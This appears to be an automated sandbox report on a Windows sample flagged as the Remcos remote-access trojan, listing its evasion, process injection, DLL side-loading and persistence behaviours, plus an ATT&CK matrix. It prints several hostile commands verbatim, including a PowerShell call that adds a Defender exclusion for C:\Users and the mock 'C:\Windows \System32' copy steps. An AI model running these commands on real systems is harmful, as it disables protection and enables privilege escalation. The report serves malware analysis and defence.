                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Uses ping.exe to sleep
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 6
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 6 Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3116Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6360Thread sleep count: 98 > 30Jump to behavior
                        Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6360Thread sleep time: -49000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
                        Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6103Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3097Jump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeDropped PE file which has not been started: C:\Program Files (x86)\eTDdgXlyKliyxvptonffOcjuSNyaDmlKRZHGbQGKEUWyXCTW\kbTpwNGCTopuOamSxeKXoFxnyEswVm.exe.tmpJump to dropped file
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeDropped PE file which has not been started: C:\Program Files (x86)\eTDdgXlyKliyxvptonffOcjuSNyaDmlKRZHGbQGKEUWyXCTW\kbTpwNGCTopuOamSxeKXoFxnyEswVm.exe (copy)Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.369676506.0000000002E63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                        Source: 0vJrK0NCd1.exe, 00000000.00000002.463584485.00000000005EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.369676506.0000000002E63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows \System32\easinvoker.exeCode function: 22_2_613C1B60 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_613C1B60

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Early bird code injection technique detected
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exe
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exeJump to behavior
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\SndVol.exe
                        Allocates memory in foreign processes
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 2E00000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFMemory allocated: C:\Windows\SysWOW64\SndVol.exe base: 3300000 protect: page execute and read and write
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 2B50000 protect: page execute and read and write
                        DLL side loading technique detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\System32\netutils.dllJump to behavior
                        Adds a directory exclusion to Windows Defender
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start /min powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start /min powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" Jump to behavior
                        Queues an APC in another process (thread injection)
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeThread APC queued: target process: C:\Windows\SysWOW64\colorcpl.exeJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c mkdir "\\?\C:\Windows " Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c mkdir "\\?\C:\Windows \System32"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ECHO FJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /YJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ECHO FJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /YJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ECHO FJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /YJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows \System32\easinvoker.exe C:\Windows \System32\easinvoker.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 6 Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start /min powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" Jump to behavior
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.374356345.0000000003418000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ShellFileViewFolderExploreFolderConfirmCabinetIDDeleteGroupDeleteItemReplaceItemReloadFindFolderOpenFindFileCreateGroupShowGroupAddItemExitProgman[RN
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.374356345.0000000003418000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %c:\%sExplorerDMGFrameGroupssetupPmFrameGetIconGetDescriptionGetWorkingDirSoftware\Microsoft\Windows\CurrentVersion\Explorer\MapGroupsSenderCA_DDECLASSInstallMake Program Manager GroupStartUpccInsDDEBWWFrameDDEClientWndClassBACKSCAPEMediaRecorderMedia Recorder#32770DDEClientddeClassgroups
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =AProgram ManagerpszDesktopTitleWM
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.376967182.000000000341B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TargetundeleteSoftware\Microsoft\Tracking\TimeOut::{9db1186e-40df-11d1-aa8c-00c04fb67863}:Shell_TrayWnd
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: GShell_TrayWndLangIDgophernewsmailtosocksjavascriptvbscriptres
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.370202146.0000000002E65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: GetProgmanWindow
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.392885475.0000000003411000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ADWMWINDOWDWMTOUCHThemeInitApiHook%s\uxtheme.dllDllNameThemeActiveLoadedBeforeLastUserLangIDLastLoadedDPILastLoadedDPIPlateausLastLoadedPPIColorNameSizeNameSoftware\Microsoft\Windows\CurrentVersion\Policies\System SetVisualStyle\rundll32.exeThemeDebuggeesshakeShell_TrayWndTEXTGLOW%s::%s%s\*.*..%s\%s\%s.msstylesLMVersionLMOverRide
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.374356345.0000000003418000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PreviewMetadataLabelPreviewMetadataSpacerPreviewEditMetadataPreviewMetadataControlIconLayoutsWorkAreaChangeActivityPreviewMetadataRowAddRemoveAppBarShell_TrayWndhomepagetasklinktasklinkTaskSearchTexttasks%s
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.374356345.0000000003418000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: animationTileContentsSrcVerticalScrollBaranimationProgressSrcanimationTileContentsDstInneranimationTileContentsSrcInneranimationTileContentsDstanimationProgressDstInneranimationProgressDstanimationProgressSrcInnereltRegularTileHeadereltSummaryeltInterruptPaneeltProgressBaridOperationTileeltInterruptDoForAlleltItemIconeltInterruptDescriptioneltInterruptButtonsContainereltInterruptDeleteBtneltInterruptElevateBtneltItemPropseltItemNameeltInterruptYesBtneltInterruptRetryBtneltInterruptCancelBtneltInterruptSkipBtnConfirmationCheckBoxDoForAlleltInterruptNoBtneltInterruptOKBtnshell\shell32\operationstatusmgr.cppidTileSubTextidOperationInterrupteltInterruptDoForAllLabelidTileActionIdTileKeepSourceidItemTileIdTileDecideForEachIdTileIgnoreIdTileKeepAsPersonalIdTileKeepAsWorkIdTileKeepDestCustomCommandIconDecideForEachTileIconSkipTileIconKeepSourceTileIconeltItemTileContainereltConflictInterruptDescriptionidTileIconidCustomConflictInterrupteltInterruptTileHeaderidConflictInterrupteltRateChartCHARTVIEW%0.2fIdTileDefaulteltPauseButtoneltTileContentseltTile%ueltTimeRemainingeltConflictInterrupteltConfirmationInterrupteltLocationseltItemsRemainingeltDetailseltScrolleltRegularTileeltCancelButtonidTileHosteltScrollBarFillereltDividereltProgressBarContainereltDisplayModeBtnFocusHoldereltDisplayModeBtnWindows.SystemToast.ExplorerEnthusiastModeprogmaneltFooterArealfEscapementSoftware\Microsoft\NotepadRICHEDIT50WlfUnderlinelfItaliclfWeightlfOrientationlfClipPrecisionlfOutPrecisionlfCharSetlfStrikeOutLucida ConsoleiPointSizelfPitchAndFamilylfQualitylfFaceName
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.376605940.0000000002E65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndSHCore.Subclass.DataSystem\CurrentControlSet\Control\HvsiWindowOverrideScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Explorer\FCM\Impolite[
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.374356345.0000000003418000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ImageList_CoCreateInstanceProgmanProgram Managercomctl32.dllImageList_ReplaceIconImageList_CreateImageList_Destroy
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.374356345.0000000003418000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |}TFoldersAppPropertiesShell*ProgmanProgmanPROGMANSoftware\Microsoft\Windows\CurrentVersion\PoliciesPolicyAutoColorizationHandleAssociationChange
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndButtonLayoutSoftware\Microsoft\Internet Explorer\LowRegistry\CommandBarbinaryDllCanUnloadNowSoftware\Microsoft\F12ShowToolsun
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.370202146.0000000002E65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SetProgmanWindow
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\colorcpl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: C:\Windows \System32\easinvoker.exeCode function: 22_2_613C1A80 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,22_2_613C1A80

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Remcos RAT
                        Source: Yara matchFile source: 35.2.SndVol.exe.3300000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 38.2.colorcpl.exe.2b50000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.0vJrK0NCd1.exe.10030000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.2.SndVol.exe.3300000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 38.2.colorcpl.exe.2b50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.475558058.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000026.00000002.564309116.0000000000608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.471795080.0000000010059000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000023.00000002.532520297.0000000000487000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000002.637978823.0000000014C28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 0vJrK0NCd1.exe PID: 6460, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected Remcos RAT
                        Source: Yara matchFile source: 35.2.SndVol.exe.3300000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 38.2.colorcpl.exe.2b50000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.0vJrK0NCd1.exe.10030000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.2.SndVol.exe.3300000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 38.2.colorcpl.exe.2b50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.475558058.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000026.00000002.564309116.0000000000608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.471795080.0000000010059000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000023.00000002.532520297.0000000000487000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000002.637978823.0000000014C28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 0vJrK0NCd1.exe PID: 6460, type: MEMORYSTR

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid Accounts1
                        Scripting                        		11
                        DLL Side-Loading                        		11
                        DLL Side-Loading                        		1
                        Disable or Modify Tools                        		121
                        Input Capture                        		1
                        System Time Discovery                        		Remote Services11
                        Archive Collected Data                        		Exfiltration Over Other Network Medium1
                        Ingress Tool Transfer                        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                        Default AccountsScheduled Task/Job1
                        Registry Run Keys / Startup Folder                        		312
                        Process Injection                        		1
                        Deobfuscate/Decode Files or Information                        		LSASS Memory2
                        File and Directory Discovery                        		Remote Desktop Protocol121
                        Input Capture                        		Exfiltration Over Bluetooth11
                        Encrypted Channel                        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsAt (Linux)Logon Script (Windows)1
                        Registry Run Keys / Startup Folder                        		1
                        Scripting                        		Security Account Manager13
                        System Information Discovery                        		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                        Non-Standard Port                        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)21
                        Obfuscated Files or Information                        		NTDS11
                        Security Software Discovery                        		Distributed Component Object ModelInput CaptureScheduled Transfer2
                        Non-Application Layer Protocol                        		SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                        Software Packing                        		LSA Secrets2
                        Process Discovery                        		SSHKeyloggingData Transfer Size Limits113
                        Application Layer Protocol                        		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonRc.common11
                        DLL Side-Loading                        		Cached Domain Credentials21
